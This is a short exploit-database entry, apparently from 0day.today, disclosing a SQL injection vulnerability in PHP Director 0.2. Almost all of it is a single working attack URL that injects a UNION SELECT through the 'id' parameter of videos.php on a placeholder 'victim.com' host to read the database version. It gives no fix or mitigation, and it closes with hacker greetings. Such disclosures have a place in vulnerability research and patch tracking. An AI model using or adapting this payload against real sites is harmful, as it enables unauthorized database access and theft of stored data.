id: 12543
date: 06/04/2010
title: PHP Director 0.2 Sql Injection Vulnerability
author: Mr.Rat
cves: 

============================================
PHP Director 0.2 Sql Injection Vulnerability
============================================


# Author: Mr.Rat [ NaSrO22@HoTmAiL.Fr ]
# Software Link: www.phpdirector.co.uk
# Version: 0.2
# Tested on: Windows Xp SP2
 
# Code :
 
http://victim.com/path/videos.php?id=-44+union+select+1,version(),3,4,5,6,7,8,9,10,11,12,13,14,15--
 
 
Greetz
To My Best Friend :: Hacker-Noir ;)



#  0day.today [2023-03-23]  #